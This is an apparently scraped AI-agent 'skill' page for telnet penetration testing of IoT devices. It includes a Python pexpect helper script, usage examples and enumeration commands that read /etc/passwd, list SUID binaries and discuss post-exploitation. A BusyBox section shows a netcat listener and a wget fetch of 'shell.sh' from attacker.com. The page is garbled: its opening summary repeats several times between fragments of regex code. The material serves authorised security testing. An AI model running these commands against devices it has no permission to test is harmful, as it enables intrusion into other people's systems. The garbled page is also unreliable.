IoT Telnet Shell (telnetshell) This skill enables interaction with IoT device shells accessible via telnet for security testing and penetration testing operations. It supports unauthenticated shells, weak authentication testing, device enumeration, and post-exploitation activities. Prerequisites - Python 3 with pexpect library ( or ) - telnet client installed on the system ( on Arch) - Network access to the target device's telnet port Recommended Approach: Telnet Helper Script IMPORTANT : This skill includes a Python helper script ( ) that provides a clean, reliable interface for telnet commu…

, # / # or / $\n r'^User@[^>]+>\\s*

IoT Telnet Shell (telnetshell) This skill enables interaction with IoT device shells accessible via telnet for security testing and penetration testing operations. It supports unauthenticated shells, weak authentication testing, device enumeration, and post-exploitation activities. Prerequisites - Python 3 with pexpect library ( or ) - telnet client installed on the system ( on Arch) - Network access to the target device's telnet port Recommended Approach: Telnet Helper Script IMPORTANT : This skill includes a Python helper script ( ) that provides a clean, reliable interface for telnet commu…

, # User@/root>\n r'^root@[a-zA-Z0-9_-]+[#\\$]\\s*

IoT Telnet Shell (telnetshell) This skill enables interaction with IoT device shells accessible via telnet for security testing and penetration testing operations. It supports unauthenticated shells, weak authentication testing, device enumeration, and post-exploitation activities. Prerequisites - Python 3 with pexpect library ( or ) - telnet client installed on the system ( on Arch) - Network access to the target device's telnet port Recommended Approach: Telnet Helper Script IMPORTANT : This skill includes a Python helper script ( ) that provides a clean, reliable interface for telnet commu…

, # root@device# or root@device$\n r'^[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+[:#\\$]\\s*

IoT Telnet Shell (telnetshell) This skill enables interaction with IoT device shells accessible via telnet for security testing and penetration testing operations. It supports unauthenticated shells, weak authentication testing, device enumeration, and post-exploitation activities. Prerequisites - Python 3 with pexpect library ( or ) - telnet client installed on the system ( on Arch) - Network access to the target device's telnet port Recommended Approach: Telnet Helper Script IMPORTANT : This skill includes a Python helper script ( ) that provides a clean, reliable interface for telnet commu…

, # user@host: or #\n r'^\\s*>\\s*

IoT Telnet Shell (telnetshell) This skill enables interaction with IoT device shells accessible via telnet for security testing and penetration testing operations. It supports unauthenticated shells, weak authentication testing, device enumeration, and post-exploitation activities. Prerequisites - Python 3 with pexpect library ( or ) - telnet client installed on the system ( on Arch) - Network access to the target device's telnet port Recommended Approach: Telnet Helper Script IMPORTANT : This skill includes a Python helper script ( ) that provides a clean, reliable interface for telnet commu…

, # Generic >\n r'^[#\\$]\\s*

IoT Telnet Shell (telnetshell) This skill enables interaction with IoT device shells accessible via telnet for security testing and penetration testing operations. It supports unauthenticated shells, weak authentication testing, device enumeration, and post-exploitation activities. Prerequisites - Python 3 with pexpect library ( or ) - telnet client installed on the system ( on Arch) - Network access to the target device's telnet port Recommended Approach: Telnet Helper Script IMPORTANT : This skill includes a Python helper script ( ) that provides a clean, reliable interface for telnet commu…

, # Standalone # or $\n r'BusyBox\\s+v[0-9.]+', # BusyBox prompt\n r'login:\\s*

IoT Telnet Shell (telnetshell) This skill enables interaction with IoT device shells accessible via telnet for security testing and penetration testing operations. It supports unauthenticated shells, weak authentication testing, device enumeration, and post-exploitation activities. Prerequisites - Python 3 with pexpect library ( or ) - telnet client installed on the system ( on Arch) - Network access to the target device's telnet port Recommended Approach: Telnet Helper Script IMPORTANT : This skill includes a Python helper script ( ) that provides a clean, reliable interface for telnet commu…

, # Login prompt\n r'Password:\\s*

IoT Telnet Shell (telnetshell) This skill enables interaction with IoT device shells accessible via telnet for security testing and penetration testing operations. It supports unauthenticated shells, weak authentication testing, device enumeration, and post-exploitation activities. Prerequisites - Python 3 with pexpect library ( or ) - telnet client installed on the system ( on Arch) - Network access to the target device's telnet port Recommended Approach: Telnet Helper Script IMPORTANT : This skill includes a Python helper script ( ) that provides a clean, reliable interface for telnet commu…

, # Password prompt\n ]\n\n def __init__(self, host: str, port: int = 23, timeout: float = 3.0,\n prompt_pattern: Optional[str] = None, debug: bool = False,\n logfile: Optional[str] = None):\n \"\"\"\n Initialize telnet helper.\n\n Args:\n host: Target host IP or hostname\n port: Telnet port (default: 23)\n timeout: Read timeout in seconds (default: 3.0)\n prompt_pattern: Custom regex pattern for prompt detection\n debug: Enable debug output\n logfile: Optional file path to log all I/O\n \"\"\"\n self.host = host\n self.port = port\n self.timeout = timeout\n self.debug = debug\n self.conn = None\n self.detected_prompt = None\n self.logfile = None\n self.logfile_handle = None\n\n # Setup prompt patterns\n if prompt_pattern:\n self.prompt_patterns = [prompt_pattern]\n else:\n self.prompt_patterns = self.DEFAULT_PROMPT_PATTERNS\n\n # Track command history\n self.command_history = []\n\n # Setup logfile path\n self.logfile = logfile\n\n # Open logfile if specified\n if logfile:\n try:\n self.logfile_handle = open(logfile, 'a', buffering=1) # Line buffered\n self._log(f\"\\n{'='*60}\\n\")\n self._log(f\"Session started: {datetime.now().isoformat()}\\n\")\n self._log(f\"Target: {host}:{port}\\n\")\n self._log(f\"{'='*60}\\n\")\n except IOError as e:\n print(f\"Warning: Could not open logfile {logfile}: {e}\", file=sys.stderr)\n self.logfile_handle = None\n\n def _debug_print(self, msg: str):\n \"\"\"Print debug message if debug mode is enabled.\"\"\"\n if self.debug:\n print(f\"[DEBUG] {msg}\", file=sys.stderr)\n\n def _log(self, data: str):\n \"\"\"Write data to logfile if enabled.\"\"\"\n if self.logfile_handle:\n self.logfile_handle.write(data)\n self.logfile_handle.flush()\n\n def connect(self) -> bool:\n \"\"\"\n Establish telnet connection.\n\n Returns:\n True if connection successful, False otherwise\n \"\"\"\n try:\n self._debug_print(f\"Connecting to {self.host}:{self.port}...\")\n\n # Spawn telnet connection\n cmd = f\"telnet {self.host} {self.port}\"\n self.conn = pexpect.spawn(cmd, timeout=self.timeout, encoding='utf-8')\n\n # Setup logfile if enabled\n if self.logfile_handle:\n self.conn.logfile_read = self.logfile_handle\n\n # Give connection a moment to establish\n time.sleep(0.5)\n\n # Send newline to get initial prompt\n self.conn.sendline(\"\")\n time.sleep(0.5)\n\n # Try to detect prompt\n try:\n # Read any initial output\n self.conn.expect(self.prompt_patterns, timeout=2.0)\n initial_output = self.conn.before + self.conn.after\n self._detect_prompt(initial_output)\n except (pexpect.TIMEOUT, pexpect.EOF):\n # If no prompt detected yet, that's okay\n pass\n\n self._debug_print(f\"Connected successfully. Detected prompt: {self.detected_prompt}\")\n return True\n\n except Exception as e:\n print(f\"Error connecting to {self.host}:{self.port}: {e}\", file=sys.stderr)\n return False\n\n def disconnect(self):\n \"\"\"Close telnet connection.\"\"\"\n if self.conn:\n try:\n self._debug_print(\"Disconnecting...\")\n self.conn.close()\n except:\n pass\n self.conn = None\n\n if self.logfile_handle:\n self._log(f\"\\n{'='*60}\\n\")\n self._log(f\"Session ended: {datetime.now().isoformat()}\\n\")\n self._log(f\"{'='*60}\\n\\n\")\n self.logfile_handle.close()\n self.logfile_handle = None\n\n def _send_raw(self, data: str):\n \"\"\"Send raw data to telnet connection.\"\"\"\n if self.conn:\n self.conn.send(data)\n\n def _detect_prompt(self, text: str):\n \"\"\"\n Detect prompt pattern in text.\n\n Args:\n text: Text to search for prompt\n \"\"\"\n lines = text.split('\\n')\n for line in reversed(lines):\n line = line.strip()\n if line:\n for pattern in self.prompt_patterns:\n if re.search(pattern, line):\n self.detected_prompt = pattern\n self._debug_print(f\"Detected prompt pattern: {self.detected_prompt}\")\n return\n\n def _clean_output(self, raw_output: str, command: str) -> str:\n \"\"\"\n Clean command output by removing echoes, prompts, and ANSI codes.\n\n Args:\n raw_output: Raw output from telnet\n command: Command that was sent\n\n Returns:\n Cleaned output\n \"\"\"\n # Remove ANSI escape codes\n ansi_escape = re.compile(r'\\x1B(?:[@-Z\\\\-_]|\\[[0-?]*[ -/]*[@-~])')\n cleaned = ansi_escape.sub('', raw_output)\n\n # Remove carriage returns\n cleaned = cleaned.replace('\\r', '')\n\n # Split into lines\n lines = cleaned.split('\\n')\n\n # Remove empty lines and prompts\n result_lines = []\n for line in lines:\n line = line.rstrip()\n\n # Skip empty lines\n if not line.strip():\n continue\n\n # Skip lines that are just the command echo\n if line.strip() == command.strip():\n continue\n\n # Skip lines that match prompt patterns\n is_prompt = False\n for pattern in self.prompt_patterns:\n if re.search(pattern, line):\n is_prompt = True\n break\n if is_prompt:\n continue\n\n result_lines.append(line)\n\n return '\\n'.join(result_lines)\n\n def send_command(self, command: str, timeout: Optional[float] = None,\n clean: bool = True) -> Tuple[str, bool]:\n \"\"\"\n Send command and wait for output.\n\n Args:\n command: Command to send\n timeout: Optional custom timeout\n clean: Whether to clean the output (remove echoes, prompts)\n\n Returns:\n Tuple of (output, success)\n \"\"\"\n if not self.conn:\n return \"\", False\n\n self._debug_print(f\"Sending command: {command}\")\n\n timeout_val = timeout if timeout is not None else self.timeout\n\n try:\n # Send command\n self.conn.sendline(command)\n\n # Give command time to execute and output to accumulate\n time.sleep(0.2)\n\n # Wait for prompt\n index = self.conn.expect(self.prompt_patterns + [pexpect.TIMEOUT, pexpect.EOF], timeout=timeout_val)\n\n # Check if we got a prompt (not timeout or EOF)\n prompt_found = index \u003c len(self.prompt_patterns)\n\n # Get the output (before is everything before the matched pattern)\n raw_output = self.conn.before\n if prompt_found:\n # After is the matched prompt\n raw_output += self.conn.after\n\n self._debug_print(f\"Raw output length: {len(raw_output)}\")\n\n # Track command\n self.command_history.append({\n 'command': command,\n 'timestamp': datetime.now().isoformat(),\n 'success': prompt_found,\n 'raw_output': raw_output[:200] + '...' if len(raw_output) > 200 else raw_output\n })\n\n # Clean output if requested\n if clean:\n output = self._clean_output(raw_output, command)\n else:\n output = raw_output\n\n self._debug_print(f\"Command completed. Success: {prompt_found}, Output length: {len(output)}\")\n return output, prompt_found\n\n except Exception as e:\n self._debug_print(f\"Error sending command: {e}\")\n return \"\", False\n\n def send_commands(self, commands: List[str], delay: float = 0.5) -> List[dict]:\n \"\"\"\n Send multiple commands in sequence.\n\n Args:\n commands: List of commands to send\n delay: Delay between commands in seconds\n\n Returns:\n List of dictionaries with command results\n \"\"\"\n results = []\n for command in commands:\n output, success = self.send_command(command)\n results.append({\n 'command': command,\n 'output': output,\n 'success': success\n })\n if delay > 0:\n time.sleep(delay)\n return results\n\n def interactive_mode(self):\n \"\"\"\n Enter interactive mode where user can type commands.\n Type 'exit' or Ctrl-C to quit.\n \"\"\"\n print(f\"Interactive mode - connected to {self.host}:{self.port}\")\n print(\"Type 'exit' or press Ctrl-C to quit\")\n print(\"-\" * 50)\n\n try:\n while True:\n try:\n command = input(\">>> \")\n if command.strip().lower() in ('exit', 'quit'):\n break\n\n if not command.strip():\n continue\n\n output, success = self.send_command(command)\n print(output)\n\n if not success:\n print(\"[WARNING] Command may have timed out or failed\", file=sys.stderr)\n\n except EOFError:\n break\n\n except KeyboardInterrupt:\n print(\"\\nExiting interactive mode...\")\n\n\ndef main():\n \"\"\"Main entry point for command-line usage.\"\"\"\n parser = argparse.ArgumentParser(\n description='Telnet Helper for IoT Remote Shell Interaction',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=\"\"\"\nExamples:\n # Single command\n %(prog)s --host 192.168.1.100 --command \"uname -a\"\n\n # Custom port\n %(prog)s --host 192.168.1.100 --port 2222 --command \"ps\"\n\n # Interactive mode\n %(prog)s --host 192.168.1.100 --port 2222 --interactive\n\n # Batch commands from file\n %(prog)s --host 192.168.1.100 --script enum_system.txt\n\n # Custom timeout\n %(prog)s --host 192.168.1.100 --timeout 5 --command \"find /\"\n\n # Raw output (no cleaning)\n %(prog)s --host 192.168.1.100 --command \"help\" --raw\n\n # JSON output for scripting\n %(prog)s --host 192.168.1.100 --command \"ifconfig\" --json\n\n # Log all I/O to file (tail -f in another terminal to watch)\n %(prog)s --host 192.168.1.100 --command \"ls\" --logfile session.log\n \"\"\"\n )\n\n # Connection arguments\n parser.add_argument('--host', '-H', required=True,\n help='Target host IP or hostname')\n parser.add_argument('--port', '-P', type=int, default=23,\n help='Telnet port (default: 23)')\n parser.add_argument('--timeout', '-t', type=float, default=3.0,\n help='Read timeout in seconds (default: 3.0)')\n parser.add_argument('--prompt', '-p', type=str,\n help='Custom prompt regex pattern')\n\n # Mode arguments (mutually exclusive)\n mode_group = parser.add_mutually_exclusive_group(required=True)\n mode_group.add_argument('--command', '-c', type=str,\n help='Single command to execute')\n mode_group.add_argument('--interactive', '-i', action='store_true',\n help='Enter interactive mode')\n mode_group.add_argument('--script', '-s', type=str,\n help='File containing commands to execute (one per line)')\n\n # Output arguments\n parser.add_argument('--raw', '-r', action='store_true',\n help='Output raw response (no cleaning)')\n parser.add_argument('--json', '-j', action='store_true',\n help='Output in JSON format')\n parser.add_argument('--logfile', '-l', type=str, default='/tmp/telnet_session.log',\n help='Log all I/O to file (default: /tmp/telnet_session.log)')\n parser.add_argument('--debug', action='store_true',\n help='Enable debug output')\n\n args = parser.parse_args()\n\n # Create telnet helper\n helper = TelnetHelper(\n host=args.host,\n port=args.port,\n timeout=args.timeout,\n prompt_pattern=args.prompt,\n debug=args.debug,\n logfile=args.logfile\n )\n\n # Connect to device\n if not helper.connect():\n sys.exit(1)\n\n try:\n if args.interactive:\n # Interactive mode\n helper.interactive_mode()\n\n elif args.command:\n # Single command mode\n output, success = helper.send_command(args.command, clean=not args.raw)\n\n if args.json:\n result = {\n 'command': args.command,\n 'output': output,\n 'success': success\n }\n print(json.dumps(result, indent=2))\n else:\n print(output)\n\n sys.exit(0 if success else 1)\n\n elif args.script:\n # Batch script mode\n try:\n with open(args.script, 'r') as f:\n commands = [line.strip() for line in f if line.strip() and not line.startswith('#')]\n\n results = helper.send_commands(commands)\n\n if args.json:\n print(json.dumps(results, indent=2))\n else:\n for i, result in enumerate(results, 1):\n print(f\"\\n{'='*50}\")\n print(f\"Command {i}: {result['command']}\")\n print(f\"{'='*50}\")\n print(result['output'])\n if not result['success']:\n print(\"[WARNING] Command may have failed\", file=sys.stderr)\n\n # Exit with error if any command failed\n if not all(r['success'] for r in results):\n sys.exit(1)\n\n except FileNotFoundError:\n print(f\"Error: Script file '{args.script}' not found\", file=sys.stderr)\n sys.exit(1)\n except IOError as e:\n print(f\"Error reading script file: {e}\", file=sys.stderr)\n sys.exit(1)\n\n finally:\n helper.disconnect()\n\n\nif __name__ == '__main__':\n main()\n","content_type":"text/x-python; charset=utf-8","language":"python","size":15874,"content_sha256":"d4a9819287f2de7175424f7c21d24272e859dc7246b064824c37ecbfc614d74d"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"IoT Telnet Shell (telnetshell)","type":"text"}]},{"type":"paragraph","content":[{"text":"This skill enables interaction with IoT device shells accessible via telnet for security testing and penetration testing operations. It supports unauthenticated shells, weak authentication testing, device enumeration, and post-exploitation activities.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Prerequisites","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Python 3 with pexpect library (","type":"text"},{"text":"pip install pexpect","type":"text","marks":[{"type":"code_inline"}]},{"text":" or ","type":"text"},{"text":"sudo pacman -S python-pexpect","type":"text","marks":[{"type":"code_inline"}]},{"text":")","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"telnet client installed on the system (","type":"text"},{"text":"sudo pacman -S inetutils","type":"text","marks":[{"type":"code_inline"}]},{"text":" on Arch)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Network access to the target device's telnet port","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Recommended Approach: Telnet Helper Script","type":"text"}]},{"type":"paragraph","content":[{"text":"IMPORTANT","type":"text","marks":[{"type":"strong"}]},{"text":": This skill includes a Python helper script (","type":"text"},{"text":"telnet_helper.py","type":"text","marks":[{"type":"code_inline"}]},{"text":") that provides a clean, reliable interface for telnet communication. ","type":"text"},{"text":"This is the RECOMMENDED method","type":"text","marks":[{"type":"strong"}]},{"text":" for interacting with IoT devices.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Default Session Logging","type":"text"}]},{"type":"paragraph","content":[{"text":"ALL commands run by Claude will be logged to ","type":"text","marks":[{"type":"strong"}]},{"text":"/tmp/telnet_session.log","type":"text","marks":[{"type":"code_inline"},{"type":"strong"}]},{"text":" by default.","type":"text","marks":[{"type":"strong"}]}]},{"type":"paragraph","content":[{"text":"To observe what Claude is doing in real-time:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# In a separate terminal, run:\ntail -f /tmp/telnet_session.log","type":"text"}]},{"type":"paragraph","content":[{"text":"This allows you to watch all telnet I/O as it happens without interfering with the connection.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Why Use the Telnet Helper?","type":"text"}]},{"type":"paragraph","content":[{"text":"The helper script solves many problems with direct telnet usage:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Clean output","type":"text","marks":[{"type":"strong"}]},{"text":": Automatically removes command echoes, prompts, and ANSI codes","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Prompt detection","type":"text","marks":[{"type":"strong"}]},{"text":": Automatically detects and waits for device prompts","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Timeout handling","type":"text","marks":[{"type":"strong"}]},{"text":": Proper timeout management with no arbitrary sleeps","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Easy scripting","type":"text","marks":[{"type":"strong"}]},{"text":": Simple command-line interface for single commands or batch operations","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Session logging","type":"text","marks":[{"type":"strong"}]},{"text":": All I/O logged to ","type":"text"},{"text":"/tmp/telnet_session.log","type":"text","marks":[{"type":"code_inline"}]},{"text":" for observation","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Reliable","type":"text","marks":[{"type":"strong"}]},{"text":": No issues with TTY requirements or background processes","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"JSON output","type":"text","marks":[{"type":"strong"}]},{"text":": For programmatic parsing and tool chaining","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Quick Start with Telnet Helper","type":"text"}]},{"type":"paragraph","content":[{"text":"Single Command:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command \"uname -a\"","type":"text"}]},{"type":"paragraph","content":[{"text":"Custom Port:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --command \"ls /\"","type":"text"}]},{"type":"paragraph","content":[{"text":"With Custom Prompt (recommended for known devices):","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --prompt \"^/ [#\\$]\" --command \"ifconfig\"","type":"text"}]},{"type":"paragraph","content":[{"text":"Interactive Mode:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --interactive","type":"text"}]},{"type":"paragraph","content":[{"text":"Batch Commands from File:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Create a file with commands (one per line)\necho -e \"uname -a\\ncat /proc/version\\nifconfig\\nps\" > commands.txt\npython3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --script commands.txt","type":"text"}]},{"type":"paragraph","content":[{"text":"JSON Output (for parsing):","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command \"uname -a\" --json","type":"text"}]},{"type":"paragraph","content":[{"text":"Debug Mode:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command \"ls\" --debug","type":"text"}]},{"type":"paragraph","content":[{"text":"Session Logging (for observation):","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Terminal 1 - Run with logging\npython3 .claude/skills/telnetshell/telnet_helper.py \\\n --host 192.168.1.100 \\\n --port 2222 \\\n --logfile /tmp/session.log \\\n --interactive\n\n# Terminal 2 - Watch the session in real-time\ntail -f /tmp/session.log","type":"text"}]},{"type":"paragraph","content":[{"text":"Note:","type":"text","marks":[{"type":"strong"}]},{"text":" See ","type":"text"},{"text":"OBSERVING_SESSIONS.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" for comprehensive guide on monitoring telnet sessions.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Telnet Helper Options","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"Required (one of):\n --command, -c CMD Execute single command\n --interactive, -i Enter interactive mode\n --script, -s FILE Execute commands from file\n\nConnection Options:\n --host, -H HOST Target host IP or hostname (required)\n --port, -P PORT Telnet port (default: 23)\n --timeout, -t SECONDS Command timeout (default: 3.0)\n --prompt, -p PATTERN Custom prompt regex pattern\n\nOutput Options:\n --raw, -r Don't clean output (show echoes, prompts)\n --json, -j Output in JSON format\n --logfile, -l FILE Log all I/O to file (default: /tmp/telnet_session.log)\n --debug Show debug information","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Common Prompt Patterns","type":"text"}]},{"type":"paragraph","content":[{"text":"The helper script includes common prompt patterns, but you can specify custom ones:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# BusyBox shell (common on IoT)\n--prompt \"/\\s*[#\\$]\\s*$\"\n\n# Standard root/user prompts\n--prompt \"^[#\\$]\\s*$\"\n\n# Custom device\n--prompt \"^MyDevice>\\s*$\"\n\n# Uniview cameras\n--prompt \"^User@[^>]+>\\s*$\"","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Device Enumeration Example with Telnet Helper","type":"text"}]},{"type":"paragraph","content":[{"text":"Here's a complete example of safely enumerating a device:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Set variables for convenience\nHELPER=\"python3 .claude/skills/telnetshell/telnet_helper.py\"\nHOST=\"192.168.1.100\"\nPORT=\"2222\"\nLOGFILE=\"/tmp/telnet_session.log\"\n\n# System information\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"uname -a\"\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"cat /proc/version\"\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"cat /proc/cpuinfo\"\n\n# Check for BusyBox\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"busybox\"\n\n# Network configuration\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"ifconfig\"\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"route -n\"\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"netstat -tulpn\"\n\n# Process listing (may need longer timeout)\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --timeout 5 --command \"ps aux\"\n\n# File system exploration\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"ls -la /\"\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"mount\"\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"df -h\"\n\n# Security assessment\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"cat /etc/passwd\"\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"find / -perm -4000 2>/dev/null\"","type":"text"}]},{"type":"paragraph","content":[{"text":"IMPORTANT FOR CLAUDE CODE","type":"text","marks":[{"type":"strong"}]},{"text":": When using this skill, ALWAYS include ","type":"text"},{"text":"--logfile /tmp/telnet_session.log","type":"text","marks":[{"type":"code_inline"}]},{"text":" in every command so the user can monitor activity with ","type":"text"},{"text":"tail -f /tmp/telnet_session.log","type":"text","marks":[{"type":"code_inline"}]},{"text":".","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Instructions","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"1. Connection Setup","type":"text"}]},{"type":"paragraph","content":[{"text":"Default connection:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Port","type":"text","marks":[{"type":"strong"}]},{"text":": 23 (standard telnet, override with ","type":"text"},{"text":"--port","type":"text","marks":[{"type":"code_inline"}]},{"text":")","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Timeout","type":"text","marks":[{"type":"strong"}]},{"text":": 3 seconds (override with ","type":"text"},{"text":"--timeout","type":"text","marks":[{"type":"code_inline"}]},{"text":")","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Logging","type":"text","marks":[{"type":"strong"}]},{"text":": ","type":"text"},{"text":"/tmp/telnet_session.log","type":"text","marks":[{"type":"code_inline"}]},{"text":" by default","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Common telnet ports on IoT devices:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"23: Standard telnet port","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"2222: Alternative telnet port (common on cameras)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"8023: Alternative telnet port","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Custom ports: Check device documentation or nmap scan results","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"2. BusyBox Shells (Most IoT Devices)","type":"text"}]},{"type":"paragraph","content":[{"text":"IMPORTANT","type":"text","marks":[{"type":"strong"}]},{"text":": The vast majority of IoT devices use BusyBox, a lightweight suite of Unix utilities designed for embedded systems. BusyBox provides a minimal shell environment with limited command functionality.","type":"text"}]},{"type":"paragraph","content":[{"text":"Identifying BusyBox:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check what shell you're using\nbusybox\nbusybox --help\n\n# Or check symlinks\nls -la /bin/sh\n# Often shows: /bin/sh -> /bin/busybox\n\n# List available BusyBox applets\nbusybox --list","type":"text"}]},{"type":"paragraph","content":[{"text":"BusyBox Limitations:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Many standard Linux commands may be simplified versions","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Some common flags/options may not be available","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Features like tab completion may be limited or absent","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Some exploitation techniques that work on full Linux may not work","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Common BusyBox commands available:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Core utilities (usually available)\ncat, ls, cd, pwd, echo, cp, mv, rm, mkdir, chmod, chown\nps, kill, top, free, df, mount, umount\ngrep, find, sed, awk (limited versions)\nifconfig, route, ping, netstat, telnet\nvi (basic text editor - no syntax highlighting)\n\n# Check what's available\nbusybox --list | sort\nls /bin /sbin /usr/bin /usr/sbin","type":"text"}]},{"type":"paragraph","content":[{"text":"BusyBox-specific considerations for pentesting:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"ps","type":"text","marks":[{"type":"code_inline"}]},{"text":" output format may differ from standard Linux","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Some privilege escalation techniques require commands not in BusyBox","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"File permissions still work the same (SUID, sticky bits, etc.)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Networking tools are often present (telnet, wget, nc/netcat, ftpget)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Python/Perl/Ruby are usually NOT available (device storage constraints)","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Useful BusyBox commands for enumeration:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check BusyBox version (may have known vulnerabilities)\nbusybox | head -1\n\n# Network utilities often available\nnc -l -p 4444 # Netcat listener\nwget http://attacker.com/shell.sh\nftpget server file\ntelnet 192.168.1.1\n\n# httpd (web server) often included\nbusybox httpd -p 8080 -h /tmp # Quick file sharing","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"3. Device Enumeration","type":"text"}]},{"type":"paragraph","content":[{"text":"Once you have shell access, gather the following information:","type":"text"}]},{"type":"paragraph","content":[{"text":"System Information:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Kernel and system info\nuname -a\ncat /proc/version\ncat /proc/cpuinfo\ncat /proc/meminfo\n\n# Distribution/firmware info\ncat 